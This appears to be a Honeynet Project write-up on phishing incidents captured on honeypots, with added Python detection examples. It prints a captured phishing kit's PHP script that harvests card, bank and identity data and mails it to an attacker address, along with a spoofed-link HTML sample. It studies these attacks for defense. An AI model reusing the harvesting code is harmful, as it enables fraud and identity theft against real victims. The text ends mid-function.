Additional Information
This side note provides further detailed background on phishing attacks, beginning with a historic overview of phishing and social engineering, and concluding with quantitative data on phishing attempts and information on high-level trends.
During the 1990s, as the popularity and take-up of the Internet grew, social engineering was gradually transformed and attackers began to focus on the mass consumer market. Phishers moved from AOL to the unregulated and more anonymous Internet, with email becoming the preferred medium for engaging (often naïve) end users. One reason for this change of focus might be that online discussion forums, IRC and instant messaging were increasingly portrayed by the press as dangerous places, where evildoers and system crackers waited to ambush unsuspecting users. Also, users had become aware that legitimate companies nearly exclusively use telephone, email and traditional postal mail as means of communication with their customers, rarely participating in less formal chat sessions. Users had also become more familiar with and confident in trusting web-based authentication systems, e-shopping with credit cards, online banking services and the protection offered by technologies such as Secure Sockets Layer (SSL) - all fronted by a myriad of different looking user interfaces.
Internet based email solutions continued to evolve at a rapid rate, with increasingly complex methods being offered to customise the look and feel of email messages and therefore potentially fooling unsuspecting users into trusting spoofed communications that might appear to be legitimate. When compared to established and relatively well policed closed loop systems, it still remains difficult for consumers to trace the exact origin of an SMTP mail message, and the available global user base of Internet email is many times larger. Even activities with a very low success rate can still be attractive to an attacker if the number of end users receiving the message is large enough to generate a number of responses, as can be witnessed by the continued growth in organisations willing to pay for the sending of spam and many users' own experiences of inboxes regularly full of unsolicited email.
In a more sinister turn, phishers have not only changed their primary means of communication to email, they have also started operating in a more organised manner and to target their attacks against more profitable information. In recent years, requests for AOL accounts or single credit card numbers have gradually been replaced with schemes aimed at obtaining more sensitive data, such as personal information that could allow unlimited access to online banking services or that could serve as a foundation to enable identity theft. Sensitive information to fraudulently impersonate another person’s identity might include name, date of birth, address, social security number or "secret" information such as mother's maiden name, account numbers, first school, pet’s name, user names, passwords, Personal Identification Numbers (PINs) or even one-time passwords (which are quite common in European Internet banking).
The following chart shows the top corporate phishing targets based on responses in a recent survey of spam recipients (October 2004) by email security company CipherTrust:
[image:../images/targets.PNG size=full]
Phishing attacks have affected many users and have caused serious problems for some major banks. In extreme cases, some banks have been forced to shut down their ebanking operations for a period of time due to phishing attacks. The exact cost to the banking industry of phishing attacks is not available in the public domain, and there are few well documented qualitative examples of public arrests and prosecution (such as in Estonia or Brazil), but it is likely to be substantial. In most cases banks will refund the money lost by their customers due to phishing attacks, although they reserve the right not to refund such losses at their discretion. Estimates by the Association for Payment Clearing Services (APACS) for the cost of phishing attacks against UK banks were £1M for the 18 months to April 2004, rising to £12M by March 2005. Australian estimates for March 2005 were A$25M, whilst Financial Insights estimates the cost to US business to be $400M in 2004. A study by Gartner estimated the cost in 2003 to be $1.2B, and the number of reported phishing attacks has massively increased since then.
In October 2004 the Anti-Phishing Working Group reported that it had seen 6597 new phishing emails, an increase of 36% on the previous month. 1142 phishing web sites were reported, double the number for September and part of a "bumper month" during a period of huge growth in automated phishing attacks. Email filtering specialist MessageLabs reported that it intercepted more than 18 million phishing messages during 2004, and the graph below clearly shows the growth in attempted phishing attacks by email:
[image:../images/phishing-mails.PNG size=full]
The loss of trust, impact on consumer confidence and the associated financial costs of phishing attacks have become important enough for banks to set up web sites such as BankSafe Online to try to educate their customers, and most target brands now provide sections of their official web site with advice on identifying and avoiding online scams (such as Citizen Bank's "Online Fraud Prevention Centre" or Citibank's "Learn About Spoofs" pages). Other organisations such as the Anti Phishing Working Group are also hoping to educate consumers as to the potential risks and teach Internet users how to avoid online scams such as phishing attacks. However, the main challenge in preventing phishing attacks is that phishing is not a pure technology problem - the major contributing factor is human nature, and as long as attackers can continue to create schemes to trick unwary users, phishing will continue to be successful and potentially lucrative. As Bruce Schneier writes in a recent weblog, even issuing all end users with two-factor authentication doesn't really help to solve the problem if the phisher is successful in tricking the users into authenticating themselves against a fake, malicious system. Given the combination of human nature, the rapid rate of technological change and the potential for illegitimate profits to be made, it seems safe to assume that the problem of phishing will get worse before it gets better.
This side note provides a more detailed overview of the two incidents discussed in the "Phishing Technique One - Phishing Through Compromised Web Servers" section of this whitepaper. One incident was captured using a honeypot deployed by the German Honeynet Project, and the other incident was captured by a honeypot deployed by the UK Honeynet Project.
The honeynet deployed and analysed by the German Honeynet Project in the first incident formed part of a diploma thesis ("Planung und Realisierung eines Honeynet zur Analyse realer Angriffe aus dem Internet") by a graduate student at MAGELLAN Netzwerke GmbH in Cologne, Germany. The honeynet was a high interaction research honeynet deployed by the German Honeynet Project during November 2004. The honeynet topology is depicted below:
[image:../images/honeynet.png size=full]
The honeynet deployed was a typical GenII honeynet based on the three basic principles defined by the Honeynet Project: data capture, data control and data analysis.
Data capture was performed by recording all inbound and outbound network traffic for later analysis, using packet sniffing tools such as tethereal. All network traffic to and from a RedHat Linux honeypot was mirrored via the monitor port of a network switch and logged using the popular open source Intrusion Detection System snort running in binary capture mode (as daily pcap files). To allow keystroke logging after a successful system compromise, version 2.1.7 of the Honeynet Project's Sebek kernel module was installed on the honeypot. The RedHat syslog daemon was also modified to output syslog information to the serial port for capture by the honeynet gateway.
For data control, all network traffic from the Internet was routed through a transparent bridging honeynet gateway running the FreeBSD release 4.10 operating system, which limited outgoing network connections from the honeypot. Outgoing connections were identified by SYN packets, differentiated and logged by TCP connection type (such as IRC connections), and the number of connections limited to 15 IRC connections and 10 other TCP connections within a 24 hour period. Connection limiting is designed to allow attackers to successfully compromise the honeypot and download a limited amount of rootkits or other malware from external servers, but then to limit their potential to attack further hosts from the compromised honeypot. It also helps to hide the presence of the honeynet gateway by not totally blocking all outbound traffic, along with preventing denial of service attacks.
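As an added illustration of the connection-limiting policy just described (this is our own example, not the honeynet gateway's code), the following Python simulation recognises the honeypot's outbound connection attempts by their SYN flag, labels each as IRC or other by destination port, and allows at most 15 IRC and 10 other connections per rolling 24 hour window. The honeypot address, the set of ports treated as IRC and the packet records are constructed assumptions.

```python
"""Simulated outbound connection limiter in the style of the honeynet's data
control policy. Added illustration, not the gateway's real code; the honeypot
address, the IRC port set and the packet records are constructed assumptions."""
from collections import defaultdict

DAY = 24 * 3600
IRC_PORTS = {6667, 6668, 6669, 7000}        # assumption: what the gateway labels "IRC"
LIMITS = {"irc": 15, "other": 10}           # limits per 24 hour period, as in the text


class OutboundLimiter:
    def __init__(self, honeypot: str):
        self.honeypot = honeypot
        self._allowed = defaultdict(list)   # class -> timestamps of SYNs let through

    @staticmethod
    def classify(dst_port: int) -> str:
        return "irc" if dst_port in IRC_PORTS else "other"

    def decide(self, ts: int, src: str, dst_port: int, flags: str) -> str:
        """Return 'pass', 'drop' or 'ignore' for one packet (ts in seconds)."""
        # Only connection attempts originating from the honeypot count: a bare SYN.
        # Inbound SYNs and the honeypot's own SYN-ACK replies are left alone.
        if src != self.honeypot or "S" not in flags or "A" in flags:
            return "ignore"
        kind = self.classify(dst_port)
        # Keep only the SYNs that are still inside the rolling 24 hour window.
        window = [t for t in self._allowed[kind] if ts - t < DAY]
        if len(window) >= LIMITS[kind]:
            self._allowed[kind] = window
            return "drop"
        window.append(ts)
        self._allowed[kind] = window
        return "pass"


def run(packets, honeypot="10.0.0.5"):
    """Apply the policy to (ts, src, dst_port, flags) records in time order."""
    lim = OutboundLimiter(honeypot)
    return [(ts, dst_port, lim.decide(ts, src, dst_port, flags))
            for ts, src, dst_port, flags in sorted(packets, key=lambda p: p[0])]


def summarize(decisions):
    counts = {"pass": 0, "drop": 0, "ignore": 0}
    for _, _, verdict in decisions:
        counts[verdict] += 1
    return counts


# Constructed traffic: 12 web connects in 12 minutes, one more a day later,
# 16 IRC connects, an inbound SYN from elsewhere and one of our own SYN-ACKs.
SAMPLE = ([(t * 60, "10.0.0.5", 80, "S") for t in range(12)]
          + [(100_000, "10.0.0.5", 80, "S")]
          + [(t * 10, "10.0.0.5", 6667, "S") for t in range(16)]
          + [(5, "198.51.100.7", 21, "S"), (6, "10.0.0.5", 21, "SA")])

if __name__ == "__main__":
    for ts, port, verdict in run(SAMPLE):
        print(f"{ts:>7}s  port {port:<5} {verdict}")
    print(summarize(run(SAMPLE)))   # {'pass': 26, 'drop': 3, 'ignore': 2}
```

The window is evaluated per connection class, so an attacker who exhausts the 10 "other" connections downloading tools is still able to reach IRC, which keeps the honeypot looking alive while the mass scanner launched later is starved of outbound SYNs.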
For data analysis, all network traffic to or from the honeypot was mirrored to a snort IDS for pattern matching against the current signature rulebase. Manual and automated analysis of logged data was performed regularly, along with real time monitoring and alerting.
The honeynet gateway was connected to a central network switch which was used to separate the honeypot network from the administrative network using VLANs, a common method of logically segmenting a network on the same physical hardware. The honeypot itself was a standard installation of RedHat Linux version 7.1 on Intel hardware running the latest version 2.4.20 kernel with several network services such as FTP (wu-2.6.1-16), HTTP (Apache 1.3.19, OpenSSL/0.9.6) and a database (MySQL 3.23.36) server enabled. All services were left in their default configuration, except for the MySQL database, which had a random secure password set for the root user. To make the system more realistic and more closely simulate a production system, a mocked-up web site for an imaginary sales company was installed and reverse DNS added for the web server.
The following table depicts the timeline of the incident:
| Date / Time | Event |
|---|---|
| 12/11/04 | First data from honeypot |
| 22/11/04 01:06 AM | Honeypot WU-FTPd compromised by autorooter |
| 22/11/04 08:21 AM | Attacker manually installs rootkit, IRC bot and Ebay phishing attack content |
| 22/11/04 06:25 PM | Attacker returns to install and run mass scanning tool |
| 22/11/04 10:40 PM | Attacker returns to install proxy server |
| 23/11/04 02:25 PM | Attacker returns to install additional rootkit |
| 23/11/04 04:40 PM | Attacker returns to set up phishing web sites and sends out spam mails (blocked by Honeywall) |
| 08/12/04 11:30 AM | Honeypot disconnected for forensic analysis |
A more detailed incident timeline, including an analysis of the tools and techniques the attackers used, is available here.
The honeynet deployed and analysed by the UK Honeynet Project in the second phishing incident was a high interaction research honeynet deployed in a UK ISP data centre during August 2004.
[image:uk-honeynet_files/image001.jpg size=full]
The UK Honeynet deployment was similar in broad outline to the German honeynet configuration detailed above, being composed of a number of physical honeypots running default installations of common UNIX operating systems on Intel and Sparc hardware. The Honeynet Project's Honeywall bootable CDROM was used for data control, providing a transparent bridging iptables firewall and using network connection rate limiting plus the snort-inline IPS to restrict outbound attack traffic. Another snort IDS provided data capture in binary pcap format, along with snort and snort-inline alerting and automated daily script based data analysis.
Individual honeypots were hosted behind the Honeywall gateway, connected to an Ethernet hub, and the Honeynet project's Sebek loadable kernel module was covertly installed and enabled on each honeypot to allow full keystroke logging. All network traffic to and from the honeypots was logged in pcap format, as were any keystrokes recorded using Sebek. Any compromised hosts were eventually taken off line and imaged for later forensic examination.
The honeypot that was compromised and used to host a phishing attack was a RedHat Linux 7.3 server on Intel hardware, a default CDROM based installation with a number of common network services such as Apache and samba enabled and left un-patched.
Again, a timeline of the incident is given:
| Date / Time | Event |
|---|---|
| 17/08/04 | First data from honeypot |
| 18/08/04 12:30 PM | Honeypot samba server compromised. Various IRC tools, backdoors and mass scanners installed by multiple groups |
| 19/08/04 | Attackers check result of network scans |
| 20/08/04 | New attackers compromise honeypot |
| 22/08/04 | More scanning activity |
| 23/08/04 09:12 PM | Phishers arrive through back door set up by initial attackers and set up phishing website |
| 23/08/04 09:23 PM | First web traffic arrives at web server for phishing site |
| 27/08/04 09:30 AM | Honeypot disconnected for forensic analysis |
A more detailed incident timeline of the UK phishing incident can be found here and more detailed analysis, including an analysis of the tools and techniques the attackers used, can be found here.
On November 12, 2004, the Honeynet was connected to the Internet. Between start-up and November 22 nothing special happened; we just observed an enormous number of packets with destination port 445, which is not critical for the installed Honeypot.
At 1:16 am the Honeypot was compromised by exploiting the WU-FTP daemon. There was no port scan or FTP connection before; the very first connection was used to compromise the computer, which is an indication of an autorooter tool. Such tools scan whole network ranges for vulnerable machines and attack everything they come across, delivering their "evil" payload to every system in the given address range. In our case, it was probably a tool called superwu, since later on the attacker used this tool to attack further targets from the Honeypot.
Until 8:21 am there was no activity from the attacker. Probably he started the tool the night before and checked in the morning for successfully gained access. As a first step he downloaded a rootkit and installed it on the Honeypot. This script-based rootkit replaces the following system binaries with trojaned files:
| Trojaned system binaries |
|---|
| /usr/bin/dir |
| /usr/bin/top |
| /bin/ps |
| /sbin/ifconfig |
| /usr/bin/slocate |
| /usr/bin/pstree |
| /bin/netstat |
| /usr/bin/vdir |
| /usr/bin/socklist |
| /usr/bin/strings |
| /usr/bin/chattr |
| /usr/sbin/lsof |
In addition, it installs an SSH daemon on port 255 which the attacker subsequently used to log on to the Honeypot. The rootkit compiles new versions of the binary files from source code. These trojaned executables are adjusted to the size of the original files on the target system to "hide" their presence. The rootkit also installs a sniffer to collect login information for other systems. Furthermore, it modifies the init scripts to ensure that the installed services start on the next reboot, and then sends an information mail about the system status to the attacker. After finishing the installation, the attacker re-entered the Honeypot via the additionally installed SSH service using the tool "putty", an SSH client for Windows systems. Afterwards the attacker downloaded a file called spam.tgz. This archive contains some PHP and HTML files. Further examination showed that these files contain web pages for updating the billing profile of seller accounts at a large Internet auction website. The attacker copied these files into the document root of the web server. The "index.html" start page is a forwarding page to the auction website, because these PHP pages were incomplete: the attacker edited them but never finished his work on these files. By tracing the IP of the attacker, the source could be located in Romania. A scan of this computer showed no open ports, so this could be the computer of the cracker.
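Because the rootkit adjusts its replacement binaries to the size of the originals, a size-only comparison is not enough to spot them; a cryptographic digest taken from clean media is. The following added Python example (our illustration, not code from the incident or the Honeynet Project) records SHA-256 digests of the twelve binaries listed above as a baseline and later re-verifies them, reporting separately the case where the size still matches. The directory tree and the "trojaned" copies are constructed in a temporary directory so the demo runs offline.

```python
"""Baseline-and-verify integrity check for the binaries this rootkit replaces.
Added example; the file tree and the tampered copies are constructed here."""
import hashlib
import tempfile
from pathlib import Path

# Binaries the rootkit in this incident replaced (list taken from the text above).
REPLACED = ["/usr/bin/dir", "/usr/bin/top", "/bin/ps", "/sbin/ifconfig",
            "/usr/bin/slocate", "/usr/bin/pstree", "/bin/netstat", "/usr/bin/vdir",
            "/usr/bin/socklist", "/usr/bin/strings", "/usr/bin/chattr", "/usr/sbin/lsof"]


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root: Path, paths=REPLACED) -> dict:
    """Record (size, sha256) of each binary under root, taken while the system is clean."""
    manifest = {}
    for p in paths:
        fp = root / p.lstrip("/")
        manifest[p] = (fp.stat().st_size, sha256_of(fp))
    return manifest


def verify(root: Path, manifest: dict) -> dict:
    """Compare the live files with the manifest; return a finding per changed path."""
    findings = {}
    for p, (size, digest) in manifest.items():
        fp = root / p.lstrip("/")
        if not fp.exists():
            findings[p] = "missing"
            continue
        if sha256_of(fp) == digest:
            continue                      # unchanged
        # A size match on a changed file is exactly what a padded trojan looks like.
        findings[p] = "modified, size unchanged" if fp.stat().st_size == size else "modified"
    return findings


def demo() -> dict:
    """Build a fake root, baseline it, tamper with two binaries, and verify."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for p in REPLACED:
            fp = root / p.lstrip("/")
            fp.parent.mkdir(parents=True, exist_ok=True)
            fp.write_bytes(b"ELF-original-" + p.encode().ljust(40, b"\0"))
        clean = baseline(root)
        # Constructed tampering: ps is padded to the original size, netstat is not.
        ps = root / "bin/ps"
        ps.write_bytes(b"ELF-trojan".ljust(ps.stat().st_size, b"\0"))
        (root / "bin/netstat").write_bytes(b"ELF-trojan-bigger-than-before" * 4)
        return verify(root, clean)


if __name__ == "__main__":
    for path, finding in demo().items():
        print(f"{path}: {finding}")
```

On a real system the manifest must come from trusted media (installation CD, package database copied before exposure), and the checker must not rely on the host's own `ls`, `strings` or `lsof`, since those are among the files replaced.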
At 8:49 am the attacker downloaded another file: psybnc.tgz. After extracting the archive, he installed the included IRC bouncer and started an IRC session to an "undernet.org" server. The channel he entered was probably used to control hacked systems. A scan of all 8 connected clients showed the same atypical open port 255 with a listening SSH daemon, just like the Honeypot. The attacker also entered another channel and received operator rights there. The topic of this channel was a pointer to his personal homepage, and the language used in that channel was Romanian.
At 6:25 pm the attacker came back and downloaded the file windmilk.tgz. This archive contains the "superwu" autorooter. After extracting the executable binary file, he started the exploiter in a screen session with a target network as parameter. Then the attacker detached the session and logged off. Later, when he came back, he re-attached the session to see the results. Since the Honeywall blocked all attacks, no systems could be compromised. The attacker did not realize the intervention and at 10:40 pm downloaded and installed a "socksify" proxy which was configured without any restrictions. With this service anybody could use the Honeypot as a proxy for spreading spam or for anonymous connections to other systems. During the honeynet's online time, it was never used.
On November 23, 2004, the attacker came back at 2:25 pm. He added the user "ro" and installed another rootkit. In a side note we present the recording of this session captured by the snort binary logging.
At 4:40 pm, the attacker downloaded the archive willson.tgz. This file includes already finished web pages similar to those in the spam.tgz archive. The attacker installed them in the document root directory of the web server. Now this Honeypot could be used for phishing attacks. Calling the start page produces a login page that looks like the original login page. While unrelated to the incident we report, a recent example comparing a phishing data entry form with the actual site can be found here.
The input of this form is checked in a rudimentary way with the help of a small PHP script:
For both input fields (username and password), the input must be longer than one character. Note the use of the strings $mesaj and $muie, which suggest a Romanian connection and have been observed in other incidents analysed by members of the UK Honeynet Project. If the input is okay, it is written to the file /tmp/User.doc and the next page is shown. On this page, the victim is tricked into entering personal information. All input is checked and if any value does not meet its condition, an error page is shown. This error page does not attempt to mimic the real error page, and most victims would likely become suspicious of the fake web site at this point.
With the help of the following validation script, the data entered into the form is checked. The resulting page of the validation process is not interpreted by the web server because Apache does not treat .dll files as PHP files by default; the attacker forgot to add an "AddType" directive to the Apache configuration so that .dll files are passed to the PHP engine. The next activity of the attacker was downloading an archive called banksend.tgz. This file includes a PHP script for sending mails:
After downloading the test.txt file, which contained 3719 e-mail addresses, the attacker started sending phishing mails to the recipients listed in this file. The source code of the mail shows the real target of the link:
```html
Please follow the link below and renew your account information. <br><br> <a href="http://XXX.XXX.XXX.XXX/Checking/login.php" onClick="popup('http://www.totalmates.com/php/click.cgi?id=xakir')" onMouseOver="window.status='https://internetbanking.bank.com';return true;" onMouseOut="window.status=' ';return true;">https://internetbanking.bank.com</a> <br> <br>
```
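The anchor above combines three tricks: the visible text is a bank URL while href points at a raw IP address, the onMouseOver handler overwrites the browser status bar so hovering shows the bank's address, and onClick fires a tracking request. As an added example (our own, not code from the incident), the Python below parses such a link and reports each of these mismatches, which is the kind of check a mail gateway or an analyst triaging a reported message can apply. The sample mail substitutes the documentation address 192.0.2.10 for the obfuscated XXX.XXX.XXX.XXX and a placeholder tracker URL; both are constructed.

```python
"""Flag deceptive anchors in HTML mail. Added example; sample messages constructed."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collect every <a> tag with its attributes and visible text."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            # HTMLParser lower-cases attribute names, so onMouseOver -> onmouseover
            self._cur = {"text": "", **dict(attrs)}

    def handle_data(self, data):
        if self._cur is not None:
            self._cur["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._cur is not None:
            self.links.append(self._cur)
            self._cur = None


def host_of(url: str) -> str:
    return (urlparse(url.strip()).hostname or "").lower()


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse_link(link: dict) -> list:
    """Return the reasons a link looks deceptive (empty list means nothing found)."""
    reasons = []
    href_host = host_of(link.get("href") or "")
    text = link["text"].strip()
    # 1. The visible text is itself a URL, but for a different host than href.
    if re.match(r"https?://", text, re.I) and host_of(text) != href_host:
        reasons.append(f"displayed {host_of(text)} but href goes to {href_host}")
    # 2. The real target is a bare IP address rather than a hostname.
    if is_ip(href_host):
        reasons.append("href host is a raw IP address")
    # 3. Hover handlers rewrite the status bar, hiding the real target.
    for attr in ("onmouseover", "onmouseout"):
        if "window.status" in (link.get(attr) or "").lower():
            reasons.append(f"{attr} rewrites window.status")
    # 4. A click handler runs code (here: a tracking request) besides navigating.
    if link.get("onclick"):
        reasons.append("onclick handler present")
    return reasons


def scan(html: str) -> list:
    """Return [(href, reasons)] for every anchor in the message body."""
    p = LinkCollector()
    p.feed(html)
    return [(l.get("href"), analyse_link(l)) for l in p.links]


# Constructed sample: the incident's anchor with placeholder IP and tracker URL.
PHISH = ('Please follow the link below and renew your account information. <br><br> '
         '<a href="http://192.0.2.10/Checking/login.php" '
         'onClick="popup(\'http://tracker.example/click\')" '
         'onMouseOver="window.status=\'https://internetbanking.bank.com\';return true;" '
         'onMouseOut="window.status=\' \';return true;">https://internetbanking.bank.com</a>')
BENIGN = '<a href="https://internetbanking.bank.com/login">https://internetbanking.bank.com</a>'

if __name__ == "__main__":
    for href, reasons in scan(PHISH) + scan(BENIGN):
        print(href, "->", reasons or "no findings")
```

The first check alone catches most link-text spoofs; the status-bar check matters for the 2004-era browsers this mail targeted, which still let page script overwrite `window.status`.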
At this point we decided to block outgoing TCP ports 25 and 443 so that no victim would suffer from the phishing attacks. The attacker probably noticed that we had blocked outgoing connections and concluded that something strange was happening. He never came back, and on December 8, 2004, the honeynet went offline for further analysis.
What else did we find?
We found archives which contained pre-packaged pages for other major banks. These pages are used for gathering credit card numbers from the victims. For example, in one case the form input will be checked with the help of JavaScript and the only condition is that the input fields are not blank. The next script sends the data to the attacker:
After this validation, the file processing.html shows just the text: "Thank you, Our update team will verify provided information and you will be contacted". In another bank page, we found that the input is not checked for reasonable values; instead, it is simply sent to the attacker by mail after the "Save" button is pressed. Furthermore, we found a mailer script for a US bank which works like the mailer script described above: a simple PHP script that reads e-mail addresses from a separate file and sends the contents of another file. The recipient file includes 83,073 mail addresses.
This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rootkit was installed, which were again reconstructed with the help of Snort log files.
Screenshot of the rootkit installation:
[image:../../images/rootkit_screenshot.png size=full]
Commands issued by the attacker:
In this side note we analyse an example script that was used to validate the information entered by users into an HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.
```php
//Checking for errors in the post:
//1 - CC nr:
if(strlen($ccnumber)<16){
$error="Invalid credit card number, please re-submit.";
$errchk=1;
}
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
$error="Invalid credit card number, please re-submit.";
$errchk=1;
}
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
$error="Invalid email address, please re-submit.";
$errchk=2;
}
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
$error="Invalid bank routing number, please re-submit.";
$errchk=3;
}
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
$error="Invalid card validation code, please re-submit.";
$errchk=4;
}
//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
$error="Invalid pin number, please re-submit.";
$errchk=4;
}
//5 fields that should exist:
else if(strlen($username)<1){
$error="Please enter your full name and re-submit.";
$errchk=5;
}
else if(strlen($streetaddr)<1){
$error="Please enter your address and re-submit.";
$errchk=5;
}
else if(strlen($cityaddr)<1){
$error="Please enter your city and re-submit.";
$errchk=5;
}
else if(strlen($mmn)<1){
$error="Please enter your Mother Maiden Name and re-submit.";
$errchk=5;
}
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
$error="Please enter your Date Of Birth and re-submit.";
$errchk=5;
}
//6 - Bad words check
else if(stristr($badw,$username)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$streetaddr)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$cityaddr)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$mmn)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
//More coming soon:)
//If no error:
if($errchk==0) {
$efile=fopen("/tmp/User.doc","r");
fscanf($efile,"%s",$userid);
fscanf($efile,"%s",$pass);
fclose($efile);
$timed = date ("l dS of F Y h:i:s A");
$ip = $_SERVER["REMOTE_ADDR"];
$message="----------------------------------------------------------------------------
On $timed the user ($ip) wrote:
CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";
$message=$message."UserId - $userid";
$message=$message."Password - $pass";
$message=$message."Email - $email";
$message=$message."Email Password - $emailp";
$message=$message."Full Name - $username";
$message=$message."Address - $streetaddr";
$message=$message."City - $cityaddr";
$message=$message."State - $stateprovaddr";
$message=$message."Zip Code - $zipcodeaddr";
$message=$message."Phone number - $phone";
$message=$message."Country - $countryaddr";
$message=$message."CVV - $cvv2";
$message=$message."Bank Name - $bank";
$message=$message."Bank Routing # - $bankr
Checking Account # - $bankc
Social Security Number - $ssn
Card PIN Number - $ccp
Mother's Maiden Name - $mmn
Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy
Driver Licence Number - $dln";
mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From: tzonfi <xxxxxx@xxxxxx.com>\n");
header ("Location:xxxxISAPI.dll");
//$muie = fopen("/tmp/eb.txt", "a");
//fwrite($muie, $message);
//fclose($muie);
//include("cc-ftp.php");
exit();
}
else {
echo $error;
}
?>
```
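For responders triaging a compromised web root, the traits of the script above translate directly into hunting heuristics: a mail() call, card and bank field names such as $ccnumber, $cvv2 and $ssn, a file opened under /tmp, a redirect to a .dll "confirmation" page and a free-mail recipient. The following added Python example (our own, not part of the original analysis) scores every PHP file in a directory tree against those indicators. The sample web root, containing an abridged constructed stand-in for such a script and a benign contact-form handler, is built in a temporary directory.

```python
"""Score PHP files in a web root for phishing-kit traits. Added example;
the sample files below are constructed and the weights are our own choice."""
import re
import tempfile
from pathlib import Path

# (name, pattern, weight) drawn from the validation script analysed above.
INDICATORS = [
    ("sends mail",            re.compile(r"\bmail\s*\(", re.I), 1),
    ("card/bank field names", re.compile(r"\$(ccnumber|cvv2|ccp|bankr|bankc|ssn|mmn)\b"), 3),
    ("writes to /tmp",        re.compile(r"fopen\s*\(\s*['\"]/tmp/"), 2),
    ("redirect to .dll page", re.compile(r"header\s*\(\s*['\"]Location:\s*[^'\"]*\.dll", re.I), 3),
    ("free-mail recipient",   re.compile(r"@(hotmail|yahoo|gmail)\.com", re.I), 1),
]


def score_source(src: str):
    """Return (total score, list of indicator names that matched)."""
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(src)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def scan_webroot(root: Path, threshold: int = 5) -> dict:
    """Return {relative path: (score, reasons)} for PHP files scoring at or above threshold."""
    findings = {}
    for fp in sorted(root.rglob("*.php")):
        score, reasons = score_source(fp.read_text(errors="replace"))
        if score >= threshold:
            findings[fp.relative_to(root).as_posix()] = (score, reasons)
    return findings


# Constructed, abridged stand-in for a kit's data processing script.
PHISH_SAMPLE = r'''<?php
if(strlen($ccnumber)<16){ $error="Invalid credit card number, please re-submit."; $errchk=1; }
if($errchk==0) {
  $efile=fopen("/tmp/User.doc","r");
  $message="CreditCard Number - $ccnumber ; CVV - $cvv2 ; Card PIN Number - $ccp";
  mail("xxxxxx@hotmail.com","xxEBAYxx","$message","From: x <x@example.com>\n");
  header("Location:xxxxISAPI.dll");
}
?>'''

# Constructed legitimate contact form handler: uses mail() but nothing else.
BENIGN_SAMPLE = r'''<?php
$body = "From: $name <$email>\n\n$comments";
mail("webmaster@example.com", "Contact form", $body);
header("Location: thanks.html");
?>'''


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Checking").mkdir()
        (root / "Checking" / "process.php").write_text(PHISH_SAMPLE)
        (root / "contact.php").write_text(BENIGN_SAMPLE)
        return scan_webroot(root)


if __name__ == "__main__":
    for path, (score, reasons) in demo().items():
        print(f"{path}: score {score} ({', '.join(reasons)})")
```

The weights keep a lone mail() call below the threshold so ordinary contact forms are not reported; the field-name and .dll-redirect indicators carry the most weight because they are specific to the kits described here.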
The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:
In this side note we provide an overview of the source IP addresses of potential victims in the redirection phishing attack described in phishing technique two. The data below was collected with the help of the compromised German honeypot and modified redir software. Over a period of about 36 hours we observed 721 redirections of inbound HTTP requests to the honeypot, presumably from recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All are potential victims of the phishing attack, but as no personal data was captured we cannot make an educated guess how many people actually entered sensitive information into the HTML form on the Chinese phishing web site.
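The table that follows can be produced from the redirector's logs with a few lines of code. The added Python example below is ours, not the modified redir software's own logging: it assumes a constructed syslog-style line recording each forwarded connection's source address, counts connections per /16 (first two octets kept, the rest masked as X) and orders the rows as the table does, by count and then by prefix.

```python
"""Aggregate redirected connections by source /16. Added example; the log
line format and the sample lines are constructed, not the real redir output."""
import re
from collections import Counter

# Assumed line shape for the modified redirector; adapt the regex to the real format.
REDIR_RX = re.compile(r"redir\[\d+\]: connect from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+ to ")


def prefix16(ip: str) -> str:
    """Mask an IPv4 address down to its first two octets, as in the table."""
    a, b, _, _ = ip.split(".")
    return f"{a}.{b}.X"


def aggregate(lines) -> list:
    """Count forwarded connections per /16; order by count descending,
    then by prefix string descending (the order used in the table)."""
    counts = Counter()
    for line in lines:
        m = REDIR_RX.search(line)
        if m:                                   # unrelated syslog lines are skipped
            counts[prefix16(m["ip"])] += 1
    rows = sorted(counts.items(), key=lambda kv: kv[0], reverse=True)
    rows.sort(key=lambda kv: kv[1], reverse=True)   # stable sort keeps prefix order on ties
    return rows


def total(rows) -> int:
    return sum(n for _, n in rows)


def render(rows) -> str:
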